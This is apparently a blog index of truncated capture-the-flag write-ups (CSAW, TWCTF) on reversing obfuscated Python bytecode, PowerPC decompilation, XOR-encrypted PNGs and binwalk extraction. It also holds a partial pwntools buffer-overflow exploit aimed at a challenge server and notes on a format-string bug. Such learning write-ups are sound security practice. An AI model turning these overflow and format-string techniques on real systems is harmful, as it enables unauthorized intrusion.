We were given a python file for this challege #!/usr/bin/env python # -*- coding: utf-8 -*- import marshal, zlib, base64 exec(marshal.loads(zlib.decompress(base64.b64decode(‘eJyNVktv00AQXm/eL0igiaFA01IO4cIVCUGFBBJwqRAckLhEIQmtRfPwI0QIeio/hRO/hJ/CiStH2M/prj07diGRP43Hs9+MZ2fWMxbnP6mux+oK9xVMHPFViLdCTB0xkeKDFEFfTIU4E8KZq8dCvB4UlN3hGEsdddXU9QTLv1eFiGKGM4cKUgsFCNLFH7dFrS9poayFYmIZm1b0gyqxMOwJaU3r6xs9sW1ooakXuRv+un7Q0sIlLVzOCZq/XtsK2oTSYaZlStogXi1HV0iazoN2CV2HZeXqRQ54TlJRb7FUlKyUatISsdzo+P7UU1Gb1POdMruckepGwk9tIXQTftz2yBaT5JQovWvpSa6poJPuqgao+b9l5Aj/R+mLQIP4f6Q8Vb3g/5TB/TJxWGdZr9EQrmn99fwKtTvAZGU7wzS7GNpZpDm2JgCrr8wrmPoo54UqGampFIeS9ojXjc4E2yI06bq/4DRoUAc0nVnng4k6p7Ks0+j/S8z9V+NZ5dhmrJUM/y7JTJeRtnJ2TSYJvsFq3CQt/vnfqmQXt5KlpuRcIvDAmhnn2E0t9BJ3SvB/SfLWhuOWNiNVZ+h28g4wlwUp00w95si43rZ3r6+fUIEdgOZbQAsyFRRvBR6dla8KCzRdslar7WS+a5HFb39peIAmG7uZTHVm17Czxju4m6bayz8e7J40DzqM0jr0bmv9PmPvk6y5z57HU8wdTDHeiUJvBMAM4+0CpoAZ4BPgJeAYEAHmgAUgAHiAj4AVAGORtwd4AVgC3gEmgBBwCPgMWANOAQ8AbwBHgHuAp4D3gLuARwoGmNUizF/j4yDC5BWM1kNvvlxFA8xikRrBxHIUhutFMBlgQoshhPphGAXe/OggKqqb2cibxwuEXjUcQjccxi5eFRL1fDSbKrUhy2CMb2aLyepkegDWsBwPlrVC0/kLHmeCBQ==’)))) After looking at the decompressed data, I realized that the header had been removed, so I compiled a pyc file and got the correct header. Here is my Get_Bytecodes.py #!/usr/bin/env python # -*- coding:… Read more »
This was my first encounter with Power PC, so this challenge was definitely fun learning experience for me. Here is my best attempt at the decompiled source code. #include <stdio.h> #include <stdlib.h> #include <string.h> int global_values[] = {0xCFE,0x859,0x95D,0x871,0x40D,6,0xADE,0xFA8,0x561,0x9DA, \ 0x878,0x682,0xFA9,0xF5F,0x25E,0xDB0,0xFBF,0xBC6,0xD38,0x95D,0xD09,0x7ED,0x307, \ 0x1C0,0x399,0x956,0xA45,0x292,0xC8A,0x92F,0x4A,0x964,0x194,0x9DA,0x11F}; int main(){ char input[35]; int *checked_against = global_values; int i; //print welcome string… Read more »
We were given the source code for this challenge. #include <cstdint> #include <cstdio> #include <cstdlib> #include <cstring> #include <functional> #include <memory> #include <unistd.h> constexpr size_t entry_len = 0x50; void strip_newline(char *buf, size_t size) { char *p = &size[buf]; while (p >= buf) { if (0 == *p or ‘\n’ == *p) { *p = 0;… Read more »
There is a struct in this program. struct Rock{ void *fp; int pass_fail; string *user_input1; string *user_input2; string *flag_str; }; Three interesting functions, which I have called init_struct, check_len_and_xor, and is_valid_key See the rest of this writeup here.
This was a very easy challenge. Basically, there was a win function at the address that is bring printed : 0x40060D. This function can be called with a simple buffer overflow. Here is my Exploit.py from pwn import * win = 0x40060D payload = “A”*72 payload += p64(win) con = remote(‘pwn.chal.csaw.io’,8000) print con.recvline() print con.recvline()… Read more »
With this challenge, they gave us an encrypted png. After a bit of trial and error I realized all I had to do was xor the first few bytes of the encrypted file with the standard header of a png. I just downloaded a sample file. Here is my get_key.py ecrypted = open(‘sleeping.png’,’rb’).read().decode(‘base64’) png =… Read more »
I thought this one was a bit easy for the amount of points it was worth. Just use some binwalk magic: binwalk -e ninth cat _ninth.extracted/63 … … TWCTF{WAMP_Are_You_Ready?}
The challenge reads as follows: Your task is to make a palindrome string by rearranging and concatenating given words. Input Format: N … Answer Format: Rearranged words separated by space. Each words contain only lower case alphabet characters. Example Input: 3 ab cba c Example Answer: ab c cba You have to connect to ppc1.chal.ctf.westerns.tokyo:31111(TCP)… Read more »
I found an unintended solution to this one, so I was pretty happy about that. The contents of the flag leads me to believe that I was intended to reverse a substitution cypher. But anyways, here is my solution. It was pretty obvious that I was dealing with some kind of cypher. The most important… Read more »
After opening the binary up in IDA, it was pretty obvious that we needed to exploit a format string vulnerability. It looks like the flag was declared as a global variable, which means it will have a static address in the .bss Section. This definitely makes our lives easier. See the full writeup here.